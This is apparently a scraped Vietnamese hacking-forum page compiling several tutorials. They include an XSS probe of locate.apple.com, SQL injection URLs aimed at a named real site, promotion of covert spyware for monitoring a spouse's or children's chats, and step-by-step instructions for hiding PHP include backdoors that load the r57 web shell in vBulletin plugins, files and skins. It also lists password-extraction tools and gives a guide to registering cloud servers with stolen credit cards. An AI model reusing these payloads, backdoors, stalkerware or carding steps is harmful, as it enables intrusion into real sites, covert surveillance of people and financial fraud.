[Tutorial] Tut check XSS locate.apple.com theo phương thức Post

Victim: locate.apple.com

Công cụ: Live HTTP để bắt các request
Bước 1: Vào trang chủ:locate.apple.com



Click chuột vào tab Services, Bật Live HTTP sau đó bắt request


Bước 2:Bật Live HTTP chương trình như sau



Bước 3:Các bạn nhìn thấy request Post trong hình rồi bây giờ click tab header->Để ý vào mục Post-> sau đo click vào Replay để request lại



Bước 4:Để ý trong nội dung Send Post content?. Mình sẽ thêm Script XSS ở đây mình thêm script sau
<script>alert('Check by kakavn_85')</script>  sau vị trí location=



Sai đó ấn nút replay đợi 1 lúc sẽ hiện ra kết quả như sau



End Tut: kakavn_85

Xem Thêm

SQL Injection - Useful Functions - Tutorial

Here are some useful function that you can use to speed up your injection and/or evade some WAFs.

If group_concat() or concat() are not available (or you can't bypass a WAF that filters out these functions) you can try and use this:

Mã:

http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,lcase(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--

or

Mã:

http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,ucase(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--

lcase() returns the lowercase value of the database/table/column names
ucase() returns the uppercase value of the database/table/column names

*Note: In some situations you'll have to use the limit 0,1 function along with these functions to get all of the database/table/column names.


Another useful thing is the max() and min() function. These functions will return the name of the first or last table/column name.

For example:

Mã:

http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,min(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--

or

Mã:

http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,max(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--

The next useful function is count(). When we're limited to the limit 0,1 function in most cases we'll have to manually increment the number in the limit function. Most sites contain the table "user" or something similar witch in most cases is located at the end of the table count (because tables/columns are alphabetically sorted). We can simply use the count() function to find out the number of tables/columns and use that number in the limit function.

For example: We first find out the number of tables:

Mã:

http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,count(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--

Now we see the number 10 but that is not the real table count. The reason behind this is that the function count() counts 0,1,2,3,4,5,6,7,8,9 witch is 10. So the number that we use in the limit function is 9.
We proceede then with the concat() function:

Mã:

http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,concat(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database() limit 9,1--

Xem Thêm

IMMonitor Yahoo Messenger Spy v2.2.9.(Full)

IMMonitor Yahoo Messenger Spy cho phép bạn theo dõi, khoá lại hoặc ghi lại các đoạn đối thoại chat trên Yahoo Messenger từ xa. Nếu con cái bạn (hay vợ, chồng bạn!) đang dành quá nhiều thời gian để chat trên Yahoo Messenger? hay bạn nghi ngờ họ dính líu tới những cuộc thoại nguy hiểm, Nếu vậy thì IMMonitor Yahoo Messenger Spy là lựa chọn tốt nhất cho bất kì ai cần thông tin về chuyện này, thật nhanh chóng và bí mật. Nó dễ sử dụng và không cần phải cài đặt trên máy đích cần theo dõi. Sẽ không ai biết rằng các cuộc đối thoại trên Yahoo Messenger của họ đang bị khoá hay ghi lại và nó sẽ không bao giờ ngừng hoạt động trừ phi bạn đóng nó lại.

Các tính năng:

• Ghi lại và lưu giữ các cuộc đối thoại qua Yahoo Messenger trên ở bất cứ máy tính nào trong mạng lưới.
• Ghi lại hoặc khoá các cuộc đối thoại trên qua Yahoo Messenger.
• Xuất các tin nhắn bị chặn ra file HTML.
• Tự động gửi báo cáo về cuộc chat qua email để xem từ xa.
• Bảo vệ bằng mật khẩu và phím nóng.
• Hoạt động ở chế độ lén lút.
• Bắt đầu ghi lại ngay từ khi mới khởi động chương trình.
• Sử dụng an toàn, dễ dàng và mạnh mẽ

LINK DOWNLOAD: http://www.mediafire.com/?qnbq246tbbq40a7

ANH CHẠY FILE CÀI ĐẶT
Giải nén, chạy file yahoochecker cài đặt bình thường. cài xong copy file patch vào thư mục cài đặt và chạy nó

XONG,
MỞ CHƯƠNG TRÌNH LÊN CHỌN CONFIG LÀM NHƯ HÌNH SAU

Khởi động lại máy là xong.

Xem Thêm

Facebook sửa lỗi bypass Password

Facebook vừa sửa lỗ hổng bảo mật vào cuối tuần qua và cho rằng nó có thể bị khai thác và có thể có trên 1 triệu tài khoản sẽ bị đăng nhập trái phép nếu không xác thực kịp thời

Trong tuần này Facebook đã vô hiệu hóa lỗ hổng mà có thể cho phép các hacker truy cập vào tài khoản người dùng mà không cần mật khẩu.
Các Hacker đã phát hiện ra lỗ hổng này của Facebook và được đăng lên vào thứ 6 vừa qua.
Theo tin tức của các Hacker. Các lỗ hổng được tập trung vào các Email từ mạng xã hội có chưa các liên kết độc hại. Khi người dùng Click vào link đó và các hacker có thể đăng nhập vào tài khoản email mà không cần dùng password hay qua một bước xác thực nào cả. Theo các thông kê tìm kiếm trên google thì có khả năng 1,3 triệu người sử dụng có khả năng dính lỗ hổng này.
Cũng như các liên kết mà có thể phơi bày các tài khoản Facebook để đăng nhập trái phép, truy vấn tìm kiếm cũng cho thấy địa chỉ e-mail liên kết với các tài khoản.Các truy vấn tìm kiếm đã tìm thấy các liên kết – chỉ là tạm thời và sẽ hết hiệu lực khi người dùng dự định nhấp vào chúng – kể từ đó đã bị vô hiệu hóa bởi Google và không hiển thị bất kỳ kết quả nào.
Kỹ sư Matt Jones của Facebook nói trên trang Hacker News  rằng Facebook không chia sẻ các liên kết. “Chúng tôi chỉ gửi các URL đến địa chỉ e-mail của chủ tài khoản để dễ dàng sử dụng và không bao giờ làm cho họ công bố công khai Thậm chí sau đó, chúng tôi đặt bảo vệ tại chỗ để làm giảm khả năng mà bất cứ ai khác có thể nhấp chuột vào các tài khoản.”
“Đối với một công cụ tìm kiếm để đi qua những liên kết này, nội dung của e-mail sẽ cần phải đã được đăng trực tuyến (ví dụ như thông qua các trang web email throwaway, như ai đó chỉ ra – hoặc những người có địa chỉ e-mail đi để gửi email danh sách với trực tuyến lưu trữ), ” ông nói thêm.
Hệ thống bảo mật của Facebook cũng chạy “kiểm tra bổ sung để đảm bảo rằng nó trông giống như chủ sở hữu tài khoản của những người đăng nhập vào”, theo Jones.
Hầu hết các liên kết trong các kết quả tìm kiếm đã có thể đã hết hạn, và Kể từ đó, Facebook đã vô hiệu hóa các tính năng cho thời gian, các kỹ sư cho biết.
“Bất kể, do một số những liên kết này bị tiết lộ, chúng tôi đã bật tính năng cho đến khi chúng tôi tốt hơn có thể bảo đảm an toàn cho người sử dụng e-mail nội dung hiển thị công khai. Chúng tôi cũng đảm bảo tài khoản của bất cứ ai đăng nhập thông qua hệ thống kiểm tra độ an toàn của facebook. “

Xem Thêm

Thay đổi agent mặc định của Firefox

1. Open " C:\Documents and Settings\username\Application Data\Mozilla\Firefox\Profiles\3vfugy1g.default\prefs.js "
2. Add the following line

Code:

user_pref(“general.useragent.override”, “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)“);

3. save and close prefs.js.
4. restart your Firefox browser

Xem Thêm

[TUT] Hack pass đã lưu trên trình duyệt

Với 3 bước đơn giản có thể lấy pass của nó và theo rõi nó mà nó không bjk

Bước 1:


Bước 2:


Bước 3



Cách này áp dụng với toàn bộ pass trên các trình duyệ

Xem Thêm

Phương pháp phát hiện và loại bỏ shell trong Database!

Có nhiều bạn hỏi tôi cách để phát hiện shell khi hacker include vào Database? Hôm nay tôi làm tut này để trả lời câu hỏi trên và giúp các bạn nhận thức thêm về vấn đề bảo mật.
Trước hết ta phải biết cách thức mà hacker include vào Data thế nào thì sau đó mới có phương pháp để loại bỏ triệt để.
Tôi xin nói thêm trong vbb những table có thể lợi dụng để include shell vào là table_template và table_plugin.
Vậy làm thế nào để phát hiện shell khi đã được include vào 2 table này nhỉ?Cách làm như sau:
- Bạn vào Phpadmin của host và search từ khóa

Code:

base64

Và làm theo hướng dẫn như hình sau:

Tại sao ta phải search từ khóa base64 mà không phải là từ khóa khác ?
Xin thưa rằng tất cả các con shell hiện nay nếu không được mã hóa thì sẽ bị antivirut tiêu diệt trừ khi đổi tên file thành file.txt
- Việc còn lại của bạn là mở table khả nghi ra và kiểm tra xem có gì đặc biệt khác thường trong đó không.

Chú ý:
- Đối với table plugin thì bạn có thể delete đi mà không ảnh hưởng gì đến việc hoạt động site.
- Đối với table template nếu bạn thích thì cũng có thể delete còn muốn dùng lại skin đó thì hãy vào admincp rồi nhấn vào revert để vbb tự động edit lại skin cho bạn.
- Bạn có thể áp dụng cách này với những code khác như wordpress, joomla, new, shop, etc…

Xem Thêm

Phương pháp include shell trong source VBB và cách phòng chống

Mình viết bài này để giúp tăng cường bảo mật cho forum của các bạn, cho các bạn thấy được cách thức mà hacker đột nhập vào trang web các bạn để từ đó có cách phòng tránh. Mình không khuyến khích các bạn làm theo để thực hiện ý đồ xấu.
Viết tut này cũng có mặt lợi và mặt hại của nó nhưng nếu các bạn biết áp dụng cho mục đích lương thiện thì nó sẽ giúp ích rất nhiều cho bạn

I/Phương diện hacker – upload shell
Bỏ qua phần làm thế nào hacker có shell trên host, mình chỉ nói đến việc hacker đã khai thác file config và hoàn toàn chiếm quyền admin của website bạn. Sau đây mình sẽ liệt kê một cách gần như đầy đủ các phương pháp mà hacker có thể chèn shell và ẩn nó trong forum của bạn để có thể dễ dàng trong những cuộc tấn công tiếp theo. 
Method 1: tạm gọi là up shell qua việc edit teamplate (cách này gần giống với kiều RFI-remote file include)
Bạn lần lượt làm như sau:
Vào admincp –>Plugin manager –>Add new plugin Ở phần HOOK Location bạn chọn là : CACHE_TEMPLATE nhé,
Phần Name: có thể đặt tên tùy ý
Phần plugin php code hãy dùng đoạn code sau để include shell:

Code:

{ 
if($_GET['nameshell']=="heloworld"){ 
include('http://localhost/r57new.php'); 
} 
}

Nhớ kích vào nút đồng ý (yes) để active plugin này nhé .

Bây giờ cùng test nhé ở đây mình test trên localhost.
bạn thêm phần ?nameshell=helloworld vào sau:
index.php hoặc image.php, online.php hay bất cứ file php nào ở ngoài index của host, cái này tùy thuộc vào bạn
Ở đây mình thử với index.php nhé

Method 2: chèn shell bằng cách edit file .php có trong host
Bạn tìm những file mà admin ít để ý để chèn đoạn code sau vào nhé, có thể chèn vào bất cứ đâu mà bạn muốn.

if ($_REQUEST['nameshell']=="helloworld") {  include ("http://localhost/r57new.php");  }

Demo: mình edit file announcement.php

<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.7.2
|| # ---------------------------------------------------------------- # ||
|| # Copyright ©2000-2007 Jelsoft Enterprises Ltd. All Rights Reserved. ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/
if ($_REQUEST['nameshell']=="helloworld") {  include ("http://localhost/r57new.php");  }
// ######################## SET PHP ENVIRONMENT ###########################
error_reporting(E_ALL & ~E_NOTICE);

// ##################### DEFINE IMPORTANT CONSTANTS #######################
define('THIS_SCRIPT', 'announcement');

// #################### PRE-CACHE TEMPLATES AND DATA ######################
// get special phrase groups
$phrasegroups = array(
    'postbit',
    'reputationlevel',
    'posting',

Hưởng thụ thành quả lao động nào

Method 3: là cách import file xml qua plugin
Bạn lần lượt làm như sau:
Plugins & Products –> Download / Upload Plugins –> chọn lấy con shell xml và import vào. (đính kèm ở bài viết)

Bạn có thể mở source file shell xml lên và thay subscriptions.php bằng repair.php hoặc faq.php (bất cứ file .php nào trong admincp mà bạn nghĩ admin site đó sẽ không chú ý đến). Bạn cũng có thể import vào nhiều file cho chắc ăn
cách run shell cũng khá đơn giản là bạn import shell vào file nào thì run file đó thôi chẳn hạn tôi import shell vào file subscriptions.php tôi sẽ run shell như thế này admincp / subscriptions.php làm theo tương tự với những file khác
demo here:

Method 4: import shell qua skin
Bạn lần lượt làm như sau:
Styles & Templates –> Download / Upload Styles –> chọn shell để upload (đính kèm ở bài viết)
Bạn muốn thêm shell vào skin nào thì ở phần Merge Into Style chọn skin đó.

Và đây là kết quả

Cũng cool đó nhỉ ^^!
II/Phương diện webmaster – giải quyết sự cố bị hack
Tiếp sau đây mình xin hướng dẫn các bạn cách clear shell trên host:
- Đầu tiên bạn sẽ phải quan sát thật kĩ xem có file nào lạ không.
- Tiếp theo bạn hãy download source forum về và dùng antivirut để check shell nếu hacker chỉ up shell thông thường lên forum và không dấu nó. Bạn chú ý xem kĩ những folder trong forum như include, modcp …
Nếu shell đã được mã hóa thì anti sẽ không check ra tốt nhất là nên up một source forum mới lên thay thế source forum cũ.
- Đối vời shell được chèn vào database và source thì tùy theo từng dạng ta có phương pháp phòng chống riêng
+ Method 1: đợi suy nghĩ xong rồi post tiếp
+ Method 2: upload new source như đã nói ở trên.
+ Method 3: bạn vào Plugin Manager bạn bắt đầu tìm với cột Hook Location nếu tìm thấy phần nào có init_startup thì đó chính là con shell mà hacker đã include vào

+ Method 4: remove skin bị đính kèm shell
Bài viết có sử dụng tư liệu của mafia_boy,quang hùng, ly0kha, alucar,meoconx …

Xem Thêm

Một số công cụ xem Password

Vận dụng tính năng lưu lại các password của các phần mềm, các công cụ sau sẽ giúp ta lấy lại các mật khẩu này:

IE Passview
- Hỗ trợ IE7
- Recovery password lưu trữ trên IE gồm: AutoComplete, HTTP Authentication, FTP
Download


Mail PassView
Xem và Export Password account Outlook Express, MS Outlook, Windows Mail,…
Download


PstPassword
Password Outlook .PST file
Download


WirelessKeyView
Download


Dialupass
Xem password Dialup/RAS/VPN
Download


Revelation
Công cụ hiển thị các password trực tiếp trên các textbox (dấu *)
Download

Xem Thêm

Một số công cụ "hack" miễn phí

17 tháng mười một 2012

Một số công cụ "hack" miễn phí

Nếu bạn là người ưa thích tìm hiểu, khám phá về phần mềm và những lĩnh vực có liên quan, chắc chắn sẽ phải cần đến bộ tổ hợp công cụ dùng để hack. Trong bài viết dưới đây, chúng tôi sẽ giới thiệu với các bạn một số chương trình hỗ trợ trực tuyến khá phổ biến và được nhiều người sử dụng.

1. Date Cracker 2000:

Date Cracker 2000 là 1 chương trình hỗ trợ có thể giúp người dùng xóa bỏ chế độ bảo vệ chương trình có liên quan đến thời gian sử dụng. Cách thức này rất có ích với những phần mềm có thời hạn dùng thử, cụ thể khi tiến hành áp dụng bằng Data Cracker 2000 thì trên chương trình đó của bạn sẽ hiển thị thông tin như There are 90 days remaining in your trial period. Nhưng đối với những ứng dụng được áp dụng kỹ thuật bảo vệ quá kỹ càng thì cách này không thực hiện được.

2. Advanced Port Scanner:

Đây là 1 tiện ích nhỏ gọn, với dung lượng vô cùng bé, tốc độ hoạt động nhanh chóng với chức năng chính là quét các cổng đang hoạt động trên hệ thống. Tất cả những gì bạn cần làm là điền địa chỉ IP của máy tính cần kiểm tra, chương trình sẽ lập tức liệt kê và hiển thị cụ thể những thông tin trên từng cổng:

[IMG][/IMG]

3. Ophcrack:

Ứng dụng đầy “sức mạnh” này có thể dễ dàng bẻ khóa hoặc khôi phục bất cứ mật khẩu nào đối với người sử dụng hệ điều hành Windows.

4. RAR Password Cracker:

Đây chắc chắn là công cụ không thể thiếu đối với bất kỳ người sử dụng nào, với khả năng có thể tìm và bẻ khóa bất kỳ mật khẩu bảo vệ nào của file RAR.

5. PC Activity Monitor:

Với cơ chế hoạt động vô cùng nhẹ nhàng nhưng cũng rất hiệu quả, PC Activity Monitor gần như không gây ra bất kỳ ảnh hưởng nào đến hệ điều hành, do vậy rất phù hợp với những mô hình hệ thống với số lượng máy tính bất kỳ. Chức năng chính của PC Activity Monitor là giám sát và thu thập toàn bộ thông tin của người dùng trên máy tính, và tất cả những thông tin dữ liệu này đều được mã hóa thành file log duy nhất, sau đó sẽ được gửi đến địa chỉ email bí mật của người điều khiển đã thiết lập trước đó.

6. Cain & Abel:

Nếu muốn khôi phục mật khẩu của các tài khoản sử dụng trong hệ điều hành của Microsoft, các bạn hãy dùng Cain & Abel. Dễ dàng bắt các gói dữ liệu được truyền tải qua hệ thống mạng, bẻ khóa mật khẩu dựa vào phương pháp Dictionary, Brute – Force và Cryptanalysis, ghi lại các đoạn hội thoại VoIP...

[IMG][/IMG]

7. SpyRemover Pro 3.05:

Với khả năng nhận dạng và tiêu diệt tới hơn 140.000 loại chương trình độc hại khác nhau, bao gồm: virus, spyware, adware, trojan... đây chắc chắn là công cụ bảo mật hỗ trợ không thể thiếu dành cho bất kỳ người sử dụng Windows nào.

[IMG][/IMG]

[LEFT]8. Nikto:

Đây là 1 hệ thống web server mã nguồn mở - Open Source (GPL) có khả năng thực hiện các cuộc kiểm tra toàn diện đối với nhiều thành phần hỗ trợ khác nhau, bao gồm hơn 3500 file dữ liệu với mức độ nguy hiểm khác nhau, tương thích với hơn 900 phiên bản server...

9. SuperScan:

[IMG][/IMG]

10. Yersinia:

Là 1 công cụ phục vụ trong các hệ thống mạng, nền tảng kỹ thuật vững chắc để kiểm tra, đánh giá và phân tích những hệ thống mạng ảo, qua đó dễ dàng xây dựng và đánh giá những thành phần cần thiết khi đưa vào áp dụng thực tế.

[IMG][/IMG]

11. PuTTY:

PuTTY là trong cổng SSH client để kết nối tới chuẩn Nokia 9200 Communicator, phiên bản hiện tại của ứng dụng bao gồm một số dịch vụ hỗ trợ giao thức SSH, bộ giả lập câu lệnh Terminal và giao diện dòng lệnh quen thuộc với người sử dụng.

[IMG][/IMG]

12. Nessus:

Với chức năng chính là rà soát để phát hiện các lỗ hổng an ninh trong các hệ thống và ứng dụng, tự động kiểm tra cấu hình, phát hiện và khôi phục dữ liệu, phân tích và báo cáo cụ thể về tình hình bảo mật hiện thời. Hiện tại, Nessus được phân phối tùy theo yêu cầu của khách hàng và quy mô cụ thể của từng hệ thống.

[IMG][/IMG]

13. Hping:

Đây là 1 công cụ phân tích gói dữ liệu TCP/IP dựa trên giao diện dòng lệnh, được chia theo 8 chức năng cụ thể khác nhau, không chỉ hỗ trợ việc gửi thông tin ICMP tới cho các thành phần yêu cầu trong hệ thống, Hping còn hỗ trợ các giao thức khác như TCP, UDP, ICMP và RAW-IP.

14. coWPAtty:

Chức năng chính của coWPAtty khi hoạt động trong bất kỳ hệ thống nào là kiểm tra và đảm bảo độ bảo mật, an toàn của những thành phần được chia sẻ đối với hệ thống WiFi Protected Access (WPA).

[IMG][/IMG]

15. DumpAutoComplete v0.7:

Ứng dụng này có khả năng tìm kiếm phần profile mặc định trong Firefox của tài khoản người dùng đã từng sử dụng công cụ và có tác động đến bộ phận cache AutoComplete của định dạng XML. Bên cạnh đó, những file AutoComplete có thể được gửi tới một số chương trình để phân tích. Điểm mạnh của công cụ này là hiểu được hầu hết cách thức hoạt động của hệ thống dựa trên các file autocomplete (với Firefox 1.x) cũng như dữ liệu lưu trữ dựa vào SQLite (Firefox 2.x).

Chúc các bạn thành công!

Xem Thêm

[TUT] VPS Win/Linux UK Chất

Nguyên liệu: CCV live là được, sock VN cũng reg được nhưng tốt nhất là trùng state.
Max cấu hình là 32GB RAM, 8 CPUs:
Có thể tạo được tối đa 10 VPS/ 1 account cloud.

 
Site:  http://www.rackspace.com/
Nó sẽ auto call đếnđọc 4 số PIN, nhập đúng 4 số đấy là activate được acc. Chỗ add CCV thì add con nào live là được, ko cần balance nhiều.

Sau khi activate acc, AE vào đây làm theo hướng dẫn của nó: Comment  !

Xem Thêm